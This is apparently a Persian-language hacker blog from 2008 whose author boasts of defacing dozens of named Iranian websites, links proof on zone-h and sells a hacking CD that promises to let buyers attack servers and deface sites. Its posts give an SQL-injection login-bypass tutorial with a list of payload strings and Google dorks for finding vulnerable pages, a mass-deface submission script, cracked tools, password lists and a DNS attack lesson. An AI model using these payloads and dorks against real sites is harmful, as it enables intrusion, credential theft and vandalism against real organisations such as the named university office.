http://shaden-qeshm.com
http://sendfromiran.com
http://sana.co.ir
http://samfar.ir
http://salmasi.com
http://sahrakav.com
http://arieon.com
http://cementcorporation.co.in
http://mali-nogomet.info
http://zolfagharco.com
www.zebra.ir
http://zagchemie.com
http://zaferco.com
http://yadaksanj.com
http://vetiran.ir/ariyan.htm
http://uktahsil.com
http://uast47.ac.ir
http://turnup.ir
http://turbogen.co.ir
http://tehrantour.com
http://tto-qom.ir
http://topazgostar.com/ariyan.htm
http://tngteam.com
http://tehran-mahoor.com
http://tavata-mfg.com
http://tapesh-medical.com/home/default.asp
http://tamkargas.com
http://www.syndipharma.org/fa/index.asp
http://www.sunseas.ir
http://soheiltarabar.ir
http://sisa.co.ir
http://sigma-photo.ir
http://shoorideh.com
http://shomaresh.ir
http://shilantranslationinstitute.com
http://shahab-shomal.com
http://seegoalco.ir
http://sd-pharmaceuticals.com/ariyan.htm
http://sarmadgroup.ir
http://sarmadexam.com
http://sargolpub.com
http://samsungiran.ir
http://samancorp.com/ariyan.htm
http://sahandfaucet.com
http://www.pargroup.ir/gallery/ariyan.htm


لینک اثبات سایتهای هک شده :

http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,shabestan_m_227/

کوچیکه همتون آریان موفق باشین.

MD5 دوشنبه ششم خرداد 1387  نظر بدهید!

CD Hack

CD Hacking                                                     

 

CD Hacking آماده شده توضیحاتی درباره این CD من میدم .
این CD شامل بخش ۱- مقالات ۲- نرم افزار ۳- اموزشهای تصویری هستش .
در این CD چه چیزهایی را یاد میگیرید ؟
مقالات :
۱- مفاهیم ایتدایی لینوکس ۲- مبانی شبکه که شامل چند بخشه ۳- آموزش اکسپلویت نویسی یا همون نوشتن کدهای مخرب ۴- آموزش کامل FTP با تمام ریزه کاری ها ۵- پویش به روشIDLE - آشنای کامل با دستورات لینوکس ۶- مفاهیم اولیه پوسته در لینوکس ۷- مباحثی در مورد پروتکل ها ۸- توضیح کامل درباره Buffer OverFlow که خودش به چند بخش تقسیم میشه ۹- مقالات کامل در باره DOS که به طور کامل توضیح داده شده ۱۰- مقاله درباره گوگل هکینگ و ... مقالات زیادی را در این CD گذاشتم که ۱۰۰٪ تو هک کردن کمکتون میکنه
آموزش های تصویری :
۱- به دست آوردن لیست یوزر و پس FTP و کانکت شدن با نرم افزار Cuttp و در اختیار گرفتن کل سرور
۲- هک سایتها (سرورهای تحت ویندوزIIS )
۳- دانلود کردن پرتالها و اسکن کردن با اکسپلویت (RFI اسکنر) و پیدا کردن باگ داخل پرتال و تبدیل به اکسپلویت کردن و در آخر هم نفوذ

۴- بمب کردن میل افراد با یه برنامه PHP
۵- DOS کردن سایت با اکسپلویت پرل جدید و Priv8
۶- فیلمهای خارجی و ....
7-
آشنایی با انواع اکسپلویت ها ( ارائه اکسپلویت های عمومی و غیر عمومی و روش کاربرد آنها )
8-
آشنایی با ابزار توانمند متااسپلویت و نحوه نصب و راه اندازی این ابزار ( فیلم های آموزشی متعدد)
9-
آشنایی با انواع شل اسکریپت ها و نحوه دسترسی به محتویات سرور ها و سایت ها
10-
مجموعه ای از فیلم های آموزشی کاملا فارسی
11-
آموزش استفاده از گوگل هکینگ در پیدا کردن سایت های آسیب پذیر (مقالات کاملا حرفه ای و فارسی)
12-
اشنایی با روش های هک سایت ( آشنایی با روش های SQL INJECTIOn - XSS -RFI-Remote command executaion ,...)
13-
اشنایی با روش های هک سرور ( سرور های ویندوز و لینوکس و نحوه بدست آوردن ROOT با استفاده ازاکسپلویت های محلی)
14-
آشنایی با روش های کلاینت هکینگ بدون ارسال حتی یک فایل ( روش های کاملا پیشرفته )
15-
فیلم های آموزشی فارسی و انگلیسی از گروه های معتبر هک در دنیا
16-
اشنایی با انواع روش های نفوذ در سایت ها
17-
مجموعه از از اکسپلویت های Priv8
18-
مجموعه بي نظير از سورس نرم افزار هاي جاسوسي
نرم افزار :
۱- فقط میتونم بگم برنامه هایی هستن که گروههای بزرگ هک میان خودشان ردو بدل میکنن و بدست آوردن آنها کاره ساده ای نیست و در کناره این برنامه ها یه برنامه هم واسه هک وبلاگ گذاشتم.
این CD تضمین میکنه که بتونین سرورهای زیادی را مورد حمله قرار بدین و بتونین سایتهای زیادی را دیفیس کنین .
خوب حالا بریم سر اصل مطلب تعداد سیدی ۲ عدد . قیمت ۸۰۰۰ تومان

جهت كسب اطلاعات بيشتر با اين ايميل در تماس باشيد.

 

Shabestan_m_227@yahoo.com

 

MD5 دوشنبه ششم خرداد 1387  نظر بدهید!

استراق سمع از هاب

چگونگی استراق سمع از هاب؟

خب تا حالا حتما اسم هاب یا سوییچ رو شنیدین همون وسیله هایی هستن که تو شبکه محلی برای اتصال دستگاه ها به همازشون استفاده می کنن خب اگه دقت کرده باشین اکثر شبکه محلی ها با هاب ساخته شده اند البته کم نیستن شبکه هایی که با سوییچ هستن!؟ولی حالا من کل رو در نظر می گیرم

حالا هاب چطوری کار می کنه؟

هاب میاد یه فریم رو از ورودیش می گیره و بعد اونو رو تمام خروجی هاش می فرسته یعنی همه می تونن اونو دریافت کنن

به این ترتیب به راحتی اگه شما روی یکی از سیستم ها یه اسنیف نصب کنین می تونن تمام ترافیک شبکه رو دریافت کنن حالا اینجا چند تا ابزار هست که برای لینوکس هست من تا حالا ابزاری برای ویندوز ندیدم!؟

Snort

www.snort.org

sniffit

www.reptile.rug.ac.be/~coder/sniffit/sniffit.html

خب هر دوی اینا خوب هستن ولی برا ی لینوکس هست می گن اسنورت برای ویندوز هم کار می کنه ولی من که دارم کار نمی کنه یعنی اصلا باز نمیشه که کار کنه

حالا اگه شبکه با سوییچ باشه چی؟

اون موقع ما باید یه کار دیگه بکنیم یعنی...!؟ برین دنبالش تا به جوابش برسین

حالا اگه واسه ویندوز رو پیدا کردین خبرم کنین

MD5 یکشنبه پانزدهم اردیبهشت 1387  نظر بدهید!

intellitamper

خوب در مورد این برنامه یه خورده توضیح بدم شما سایتی رو هک کردید یوزر و پس هم ردیف شده اما صحفه لوگین رو نمیدونین دیگه باید متوجه شده باشین منظورم چیه این برنامه ساختار سایت رو بهتون نشون میده

لینک دانلود

MD5 جمعه سیزدهم اردیبهشت 1387  نظر بدهید!

یکی از ضعف های اس کیو ال (Sql Injection)

يكي از نقطه ضعف هاي Sql رشته ي ساختار ان ميباشد كه هميشه آسيب پذير بوده و مورد حمله قرار ميگيرد اين آموزش به شما روشهايي ياد ميده كه بتوانيد اين ساختار را مورد حمله قرار بدهيد .
حالا ميتوانيد در گوگل عبارت زير را سرچ كنيد :
allinurl: login.asp
در جواب براي شما تقريبا 17 هزار مورد پيدا ميكند . حالا به لينك يافته ها دقت كنيد مثلا چنين خواهيد يافت :
www.site.com/login.asp
يا چيزهايي مشابه اين . اين قسمتها را ميتوانيم مورد حمله قرار دهيم . حالا به ساده ترين سمت رسيديم كافي است براي رد كردن اين مانع بصورت زير عمل كنيد بجاي يوزر نيم Admin را بزنيد و بجاي پسورد از اين عبارت استفاده كنيد:
or 1=1—
شايد تا حالا كه مقاله را خوانده ايد تعجب كرده ايد كه اين امر چگونه امكان پذير است . در تمامي اين عمليات اطلاعات لاگين شما بصورت Query فرستاده ميشود . اگر اطلاعات درست باشد شما اجازه ي ورود خواهيد يافت وگرنه با پيغام Login Failed مواجه خواهيد شد . وقتي شما ارسالي را با يوزر ادمين و با پسورد 1234 را ارسال ميكنيد از حالت اول به حالت دوم تغيير پيدا ميكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از اين تركيبات شما ميتوانيد با توجه به ساختار اس كيو ال براي آن پسورد هايي ارسال كنيد كه در صورت قرار گرفتن در اين پسورد مورد قبول قرار گيرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . اين تركيبات كه با توجه به ساختار اس كيو ال نوشته شده به اين صورت ميباشد نمونه هايي از آن مشاهده ميكنيد :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

همانطور كه مشاهده كرديد اين روش يك روش ساده اما ابتكاري مباشد كه احتياج به تفكر دقيق دارد البته ساختار ها متفاوت ميباشند و شما ميتوانيد همه ي اين تركيبات بالا را به عنوان پسورد امتحان كنيد و حتما به جواب خواهيد
رسيد .

MD5 پنجشنبه دوازدهم اردیبهشت 1387  نظر بدهید!

Zone-h.org Mass Deface

سلام دوستان امروز هم گفتم یه اکسپلویت واسه شما بذارم کارش اینه که اگه سایت هک کردین دیگه تو Zone نمیرین که وقتتون هدر بره این اکسپلویت واستون ثبت میکنه اکسپلویت به زبان پرل هستش و باید اکتیو پرل رو سیستمتون نصب باشه. یکی از دوستان هم سوال کرده بود که سایتهای آسیب پذیر Sql را از گوگل پیدا کنیم . خوب دوست عزیز شما باید به این صورت تو گوگل سرچ بزنین inurl view.asp?id= امیدورام که متوجه منظورم شده باشی

لینک دانلود

MD5 پنجشنبه دوازدهم اردیبهشت 1387  نظر بدهید!

SQL-Inje

 در این فیلم آموزشی یاد میگیرین چطور با دستورات SQL یوزر و پس سایت معاونت غذا و دارو دانشگاه علوم پزشکی تهران رو بکشین بیرون

سایتهای ایرانی زیاده و 99% با این روش هک میشن .

لینک دانلود

MD5 شنبه هفتم اردیبهشت 1387  نظر بدهید!

Acunetix Web Vulnerability Scanner 5.1

 قابلیت آپدیت داره...

قابلیت سیو نتیجه رو داره...

تمام پروفایل هارو میتونید انتخاب و اسکن کنید...


*نکته: حتما از Setup موجود در فایل rar استفاده کنید ! با setup های موجود فرق داره !

نصب کنید !
بعد Patch رو توی پوشه نصب شده کپی کنید و DLL رو Patch کنید

برنامه رو باز کنید بازم error میده ، بعد تو برنامه یک سریال الکی میدید ! برنامه رو می بندید و دوباره اجرا می کنید ! تمام شد.

موفق باشید.

لینک دانلود

MD5 پنجشنبه هشتم فروردین 1387  نظر بدهید!

iranactor هک شده

 سلام دوستان سایت هنرمندان iranactor هک شده به عشق محمد رضا فروتن

http://iranactor.com/actor.html

لینک اثبات

MD5 شنبه سوم فروردین 1387  نظر بدهید!

password list با حجم 78 مگا بایت

سلام دوستان واستون یه پسورد لیست آوردم که خودم هنوز دانلود نکردم به خاطر حجم زیادش اونایی که ADSL دارن دیگه مشکلی ندارن تو دانلود نظر یادتون نره

لینک دانلود

 

MD5 شنبه سوم فروردین 1387  نظر بدهید!

دانلود نسخه ی جدید cain 4.9.14

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.

لینک دانلود

MD5 سه شنبه بیست و یکم اسفند 1386  نظر بدهید!

هک شدن سایت معاونت غذا ...

سلام دوستان امیدوارم که حالتون خوب باشه خیلی وقته فیلم آموزشی درست نکردیم گفتیم یه فیلم درست کنیم تا یه حالی به بچه ها داده باشیم در این فیلم با متد Injec یاد میگیرید که چطور سایت معاونت عذا و دارو رو هک کنین نظر یادتون نره

لینک دانلود

MD5 سه شنبه بیست و یکم اسفند 1386  نظر بدهید!

شروع هك (جلسه 2)

بحث تا جايي ادامه پيدا كرد كه ما با استفاده از whois ، اطلاعاتي در مورد سايت بدست آورديم . در ايران ، چون صاحبين سايتها ، امكان ثبت مستقيم دامنه ي مورد نظر خودشون رو ندارند ، اين كار رو به عهده ي يك سري از شركتها ميسپرند ، و معمولاً اطلاعات داخل بانك اطلاعاتي دامنه ها ، اطلاعات شركت ثبت كننده هست ، نه اطلاعات صاحب سايت . ( بعضي از اين فيلدها قابل تغيير هستند ، اما خيلي ها اون رو تغيير نميدند ) . اما گفتيم كه در بين اطلاعاتي كه از whois بدست مياد ، آدرس DNS ها خيلي مهم هستند . بنابرين قبل از اينكه مراحل بعدي جمع آوري اطلاعات رو ادامه بديم ، در اين مقاله بر روي DNS ها مكث مي كنيم .

چرا DNS مهم هست ؟ DNS يكي از كامپونت هاي اصلي اينترنت هست . پس هر جا كه اينترنت هست ، DNS هم هست . مايكروسافت DNS رو يكي از كامپونت هاي اصلي AD قرار داده و اين نشون دهنده ي اهميت اين سرويس هست . از نظر ما ، اين سرويس به خاطر اين گستره ي كاربري ، ميتونه جالب باشه . اگر يه سازماني بخواد اجازه دسترسي به اينترنت رو بده ( كه همه اين كار رو ميكنند ) ،بايد اجازه خروج و ورود query هاي DNS رو به شبكه داخلي سازمان بده . و اين ميتونه خيلي معني داشته باشه . پس بهتره كمي DNS ها رو بهتر بشناسيم .

همونطور كه ميدونيد ، وظيفه ي اصلي DNS ها ، ترجمه ي آدرس دامنه ها به آدرس IP هست . سازمان جهاني IANA ( بخوونيد يانا ) ، روي اسمها و آدرسها نظارت داره و اونها رو مديريت ميكنه . DNS ها از يك ساختار سلسله مراتبي استفاده ميكنند . بنابرين بالاترين سطح DNS ها رو Root Level DNS ميگند . شبكه اينترنت وابسته به 13 سرور Root Level هست ، كه اسم ، آدرس و موقعيت اونها رو ميتونيد در آدرس
http://www.root-servers.org ببينيد . اين 13 سرور ، به شدت محافظت ميشند . يعني از نظر فيزيكي ، در حد پايگاه هاي نظامي و از نظر امنيت خود سرورها ، در بالاترين حد قرار دارند . به طوري كه سيستم عامل مورد استفاده در اين سرور ها ، يك نوع خاص از يونيكس هست كه مشابه اون در جاي ديگه وجود نداره . اين مسئله نشون دهنده ي اهميت DNS ها هست . ولي با اين وجود ، و به همين دليل مهم بودن ، تكنيكهاي مختلفي براي سو استفاده از DNS ها وجود داره . قبل از اينكه اين تكنيكها رو شرح بدم ، بايد با روش كار DNS آشنا باشيد . بهترين راه فهميدن نحوه ي كار DNS اين هست كه با يك مثال واقعي اون رو بررسي كنيم . وقتي ما به اينترنت وصل ميشيم ، در حقيقت يك كامپيوتر از يك شبكه داخلي ميشيم كه ISP ارتباط ما رو مديريت ميكنه . در اين حالت ، ما از DNS داخلي ISP استفاده ميكنيم . DNS مثل يك دفترچه راهنماي تلفن ميمونه كه بايد بتونه شماره تلفن هر شخص رو بر اساس نام اون شخص پيدا كنه . واضح هست كه مدير يك ISP محلي در تهران ، نميتونه همه ي شماره تلفن ها يا آدرس IP ها رو براي همه ي نامهاي موجود در اينترنت ، براي DNS خودش تعريف كنه . بنابرين DNS يك ISP محلي ، چيزي نيست جز يك واسطه .اين DNS ها ، فقط تعداد كمي ركورد مربوط به ماشينهاي داخل شبكه خودشون و قابليت cache كردن ركوردها و بعضي اطلاعات رو براي بالا بردن سرعت دارند . اين نوع DNS ها رو Non- authoritative ميگند . وقتي ما در برازر خودمون يك آدرس رو تايپ ميكنيم ، مثل http://www.h4ckcity.com، برازر درخواست تبديل اين اسم رو به شماره IP ، ميفرسته براي DNS مربوط به ISP ما . حالا اگر قبلاً DNS ما ، چنين درخواستي رو داشته ، و اون رو cache كرده باشه ، شماره ip رو براي ما برميگردونه ، و در غير اين صورت ، درخواست رو براي DNS بالاتر از خودش ميفرسته . اين ارسال درخواست ها به صورت سلسله مراتبي ادامه پيدا ميكنه ، و اگر در هر مرحله درخواست نا موفق بود ، نهايتاً به DNS هاي سطح بالاتر ميرسه كه به اونها authoritative ميگند . اگر اين DNS ها هم نتونند ، ركوردي براي درخواست مورد نظر پيدا كنند ، اون رو براي root ها ميفرستند و اگر باز هم ركوردي پيدا نشد ، نتيجه ميگيريم كه دامنه ي مورد درخواست ما ثبت نشده و وجود نداره . اين يك شماي خيلي ساده شده از روش كار DNS ها بود.

اما مشكلات اين ساختار سلسله مراتبي چي هست ؟ واضح هست كه همه ي مشكلات در همين ارسال و دريافت اطلاعات بين DNS ها نهفته هست .

يكي از مشكلات قديمي كه فكر ميكنم در حال حاضر فقط بايد در حد اطلاعات عمومي باهاش آشنا باشيم ، Zone Transfer هست . داستان اين Zone Transfer هم اين هست كه همه جا ، به خاطر اهميت سرويس DNS ، از حداقل دو تا DNS استفاده ميشه كه اولي master يا primary هست و وظيفه ترجمه آدرس ها رو داره ، و دومي slave يا secondary هست و وظيفه كمكي رو داره . حالا طبق اصول مديريتي شبكه ، اطلاعاتي كه در DNS اولي هست ، بايد طبق يك برنامه زمان بندي شده ، يا درخواست مستقيم DNS دومي ، به DNS دوم هم منتقل بشه كه اين DNS هم اطلاعاتش به روز باشه . حالا اگر تنظيمات در سرور DNS اول طوري باشه ، كه اين اطلاعات درخواستي رو براي هر سيستمي كه درخواست كرد ، بفرسته ، مشكل Zone Transfer داره ، و اگر يك همچين سروري پيدا بشه ، هكر ميتونه تمام اطلاعات ركورد شده روي اون DNS رو كه شامل آدرس هاي خصوصي اون شبكه هم ميشه رو بدست بياره و به اين شكل اطلاعات كاملي از شبكه ي هدف به چنگ بياره . براي جلوگيري از اين حالت بايد سرور اصلي رو به گونه اي تنظيم كرد كه فقط اطلاعات رو براي آدرس سرور دوم بفرسته و به درخواست هاي ديگه پاسخ نده . جهت اطلاع هم بايد بگم كه دو نوع Zone Transfer داريم . يكي Full يا AXFR كه تمامي اطلاعات ارسال ميشه و ديگري هم Incremental يا IXFR كه آخرين تغييرات بعد از آخرين ارسال ، ارسال ميشه .

يكي ديگه از مشكلات ساختاري DNS ها ، كه نسبت به قبلي متداول تر هست ، DNS Spoofing هست . در اين حالت ، درخواست كننده به جاي اينكه به آدرس صحيح ارجاع داده بشه ، به يك آدرس غلط فرستاده ميشه . اين نوع حملات به چند روش قابل اجرا هست . همونطور كه در بالا اشاره كرديم ، در مسير سلسله مراتبي ، تعدادي DNS ممكنه وجود داشته باشه كه كارشون cache كردن هست . اگر يك هكر بتونه اطلاعات غلطي رو به جاي اطلاعات صحيح وارد cache اين سرورها بكنه ، ميتونه درخواستهاي بعدي براي يك سايت خاص رو كه از اون DNS ميگذرند رو به يك آدرس ديگه منحرف كنه . اين حملات به DNS Cache Poisoning معروف هستند.
حالت ديگه ميتونه اين باشه كه هكر يك جايي بين درخواست كننده و سرور DNS قرار بگيره و به ترافيك گوش بده ، و هر وقت متوجه درخواستي شد ، قبل از اينكه DNS به اون درخواست جواب بده ، جواب غلط رو براي درخواست كننده بفرسته و اون رو به آدرس ديگه اي ارجاع بده . به اين حالت Spoofing DNS Response ميگند .
حالت سوم ميتونه اين باشه كه هكر كنترل يك DNS رو در دست بگيره و ... . به اين حالت DNS Server Compromise ميگند .

خب ، به نظر ميرسه كه مباحث مربوط به DNS تموم شده باشه . اما اينطور نيست. جالب ترين بخش داستان DNS ها ، استفاده از اونها در حملات SQL Injection هست . حتماً مي پرسيد كه DNS چه ربطي به SQL Injection داره ؟
موضوع اينجاست كه MS SQL و Oracle يك سري توابع و پروسيجر دارند كه ميتونند مستقيم يا غير مستقيم با DNS ها كار كنند و اطلاعات بگيرند . بعضي از اين دستورات و توابع با كاربر public هم قابل اجرا هستند و به بعضي از اونها هيچ اشاره اي در راهنما هاي hardening در ايمن سازي بانكهاي اطلاعاتي نشده . چون اين روش خيلي پيچيدگي داره ، من اون رو در بخش " حملات تحت وب " و SQL Injection بررسي ميكنم ، اما علاقمندان ميتونند به ارائه ي آقاي "پاتريك كارل سن" در كنفرانس Defcon 15 ، تحت عنوان SQL Injection & OOB Channels مراجعه كنند .

در درس بعدی , مراحل بعدی جمع آوری اطلاعات رو ادامه میدیم .

MD5 یکشنبه هفتم بهمن 1386  نظر بدهید!

آخرين مطالب ارسالي
MySQL Hash Cracker
تارگت LFI و SQL
آب و فاضلاب کشور
موسسه آموزش عالی روزبهان
چندتا مقاله فارسی هک
مقاله در مورده نفوذ به سرورهای apache
مرجع کامل ضد امنیت
sqliHelper 2.7
Wordlist generator
سایت نانو
درباره وب
سلام دوستان برای قرار دادن تبلیغات میتونین با ایمیل زیر در تماس باشین shabestan227@gmail.com

عضويت در خبرنامه





Powered by WebGozar



ساعت



لينک دوستان


صفحه اصلي  |  آرشيو |  لينکستان  |  تماس با ما




 Design By md5.blogfa.com & Publish By Ariyan


قالب وبلاگ

Free Template Blog

قالب بلاگفا

بزرگترين آرشيو فيلم هاي دي وي دي